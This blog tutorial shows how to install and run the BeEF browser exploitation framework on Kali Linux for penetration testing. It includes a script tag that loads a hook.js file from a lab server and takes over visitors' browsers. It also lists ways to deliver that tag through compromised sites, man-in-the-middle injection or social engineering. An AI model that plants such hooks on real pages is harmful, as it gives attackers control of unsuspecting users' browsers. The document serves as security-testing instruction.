BlogHeader

 

 

 

BeEF is short for The Browser Exploitation Framework. it’s a testing tool designed to enable penetration testers to launch client-side attacks against target browsers. By using techniques similar to common drive-by malware, testers can assess the security of a target’s internal environment, bypassing the hardened perimeter.

 

Growing concerns about web-borne attacks against clients, including mobile clients, BeEF allows the professional penetration tester to assess the actual security posture of a target environment by using client-side attack vectors.

Unlike other security frameworks, BeEF looks past the hardened network perimeter and client system, and examines exploitability within the context of the one open door: the web browser. BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context.
In this post, I’ll show you the quickest way to get up and running with BeEF using Kali Linux. Then we’ll explore the basic structure of the program. By the end of the post you should be able to begin using BeEF in your own testing.
Installation on Kali is very simple. Since they’ve created a nice package we can simply use apt-get to install it. Just to make sure we’ve got the most recent version, we’ll update our package list first.

 

#apt-get update
#apt-get install beef-xss
Once the install is finished, we can change to its directory and launch BeEF:

 

#cd /usr/share/beef-xss
#./beef

 

You should see the following:

 

Screenshot from 2014-07-14 20:22:24

 

This screen tells us that BeEF is running on two different interfaces, locally and internally, both on port 3000. It also provides the link for the “hook” and the user interface control panel. All of these settings and more are customizable via the “config.yaml” file found in the program’s root directory.

 

Now that BeEF is up and running, let’s check out the control panel. Using a web browser we’ll browse to the link listed above. In my case it’s http://192.168.31.20:3000/ui/panel. You should be able to access this link from any machine on the same local network, but if you have a host-based firewall turned on you may need to open the appropriate ports to access it. The user name and password are beef:beef.

 

Screenshot from 2014-07-14 20:27:19

 

 

Once logged in we’re greeted with a helpful Getting Started page that explains some of the additional options. But the most important point is in the first paragraph. Here we learn how to “hook” a browser. BeEF provides two example pages in order to test with.

 

The BeEF hook is a JavaScript file hosted on the BeEF server that needs to run on client browsers. When it does, it calls back to the BeEF server communicating a lot of information about the target. It also allows additional commands and modules to be ran against the target. In this example, the location of my BeEF hook is at  http://192.168.31.20:3000/hook.js.

 

In order to attack a browser, we need to include our JavaScript hook in a page that the client will view. There are a number of ways to do that, but the easiest is to insert the following into a page and somehow get the client to open it.

<script src= “http://192.168.31.20:3000/hook.js&#8221;  type= “text/javascript” ></script>

 

In a real-world test, you could insert this link in a page via a compromised web server, inject it into traffic after a successful man-in-the-middle attack, or use social engineering techniques such as phone calls, emails, or social network links to get the target to visit the page.

 

For demonstration, we going to use demo page  IP:3000/demos/butcher/index.html  in BeEF.  The page shows some delicious looking beef, and nothing really seems awry. But what the user can’t tell, is that this particular webpage contained a hook. A malicious program that allows an attacker to hook the browser and, well, pretty much take over complete control of the browser.

 

Screenshot from 2014-07-14 20:25:59

 

 

As soon as the visitor simply visits the page, the hook is set. Notice that the user does not have to run anything or mouse over anything for the attack to work. Just visiting the page triggers the attack.
Go back to the BeEF Control Panel and click on “Online Browsers” on the top left. After a few seconds you should see the IP address pop-up representing a hooked browser. Hovering over the IP will quickly provide information such as the browser version, operating system, and what plugins are installed.

 

Screenshot from 2014-07-14 20:33:15

 

Screenshot from 2014-07-14 20:28:04

 

 

Now click on the Commands tab. You’ll find a wide range of commands and exploits that can be launched against your target. Try them out, but be patient; sometimes it takes awhile for commands to finish and report their results. The more you experiment with each command, the more you’ll know how reliable it is and how best to use it.

 

Screenshot from 2014-07-14 20:35:10

 

Notice that some of the commands have different colored icons. If you click back to the Getting Started tab, there’s an explanation of what each of the colors represent.

 

Now that you’re up and running there’s a lot more that you can do with BeEF. Experiment with the different options in your lab so that you’ll be ready to go when the opportunity presents itself during an engagement.

 

In addition to the exploits listed, BeEF can also be integrated with Metasploit in order to launch a wider range of exploits against the host system. That’ll be another blog post.